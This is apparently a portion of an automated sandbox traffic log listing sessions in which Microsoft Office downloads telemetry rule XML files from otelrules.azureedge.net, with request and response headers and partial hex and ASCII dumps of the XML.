                                                                                                      2024-10-08 18:51:42 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      131192.168.2.74984513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:42 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:42 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:42 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1370
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                      ETag: "0x8DC582BDE62E0AB"
                                                                                                      x-ms-request-id: 838d7376-001e-0014-17fe-165151000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185142Z-1657d5bbd487nf59mzf5b3gk8n00000004z000000000qzz4
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:42 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      132192.168.2.74984413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:42 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:42 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:42 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1407
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                      ETag: "0x8DC582BE687B46A"
                                                                                                      x-ms-request-id: 20e89b60-501e-008c-3a03-17cd39000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185142Z-1657d5bbd48xlwdx82gahegw4000000005fg00000000zg2t
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:42 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      133192.168.2.74984613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:42 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:42 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:42 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1397
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE156D2EE"
                                                                                                      x-ms-request-id: 7d18055e-701e-0098-56ff-16395f000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185142Z-1657d5bbd48lknvp09v995n7900000000530000000003ycn
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:42 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      134192.168.2.74984713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:42 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:42 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:42 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1360
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                      ETag: "0x8DC582BEDC8193E"
                                                                                                      x-ms-request-id: 0fbd9a7d-901e-0015-264d-19b284000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185142Z-1657d5bbd48xjgsr3pyv9u71rc00000001cg00000000c4wz
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:42 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      135192.168.2.74984813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:42 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:42 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:42 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1406
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                      ETag: "0x8DC582BEB16F27E"
                                                                                                      x-ms-request-id: 770fdf22-501e-0035-0d02-17c923000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185142Z-1657d5bbd48jwrqbupe3ktsx9w00000005mg00000000cv41
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:42 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      136192.168.2.74985113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:43 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:43 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:43 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1377
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                      ETag: "0x8DC582BEAFF0125"
                                                                                                      x-ms-request-id: fba86ca6-e01e-00aa-5200-17ceda000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185143Z-1657d5bbd48xsz2nuzq4vfrzg8000000055g00000000v9pb
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:43 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      137192.168.2.74985013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:43 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:43 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:43 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1414
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                      ETag: "0x8DC582BE03B051D"
                                                                                                      x-ms-request-id: 4543d13f-701e-0050-5a04-176767000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185143Z-1657d5bbd482krtfgrg72dfbtn00000005000000000125d1
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:43 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      138192.168.2.74984913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:43 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:43 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:43 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1369
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                      ETag: "0x8DC582BE32FE1A2"
                                                                                                      x-ms-request-id: c55b1dc3-701e-0097-42e9-16b8c1000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185143Z-1657d5bbd48q6t9vvmrkd293mg000000057g0000000110a4
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:43 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      139192.168.2.74985213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:43 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:43 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:43 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1399
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                      ETag: "0x8DC582BE0A2434F"
                                                                                                      x-ms-request-id: 961c0255-701e-005c-1406-17bb94000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185143Z-1657d5bbd482lxwq1dp2t1zwkc0000000500000000014ddm
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:43 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      140192.168.2.74985313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:43 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:43 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:43 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1362
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                      ETag: "0x8DC582BE54CA33F"
                                                                                                      x-ms-request-id: 401481e1-301e-0099-6a5a-176683000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185143Z-1657d5bbd48qjg85buwfdynm5w00000005hg000000004ubp
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
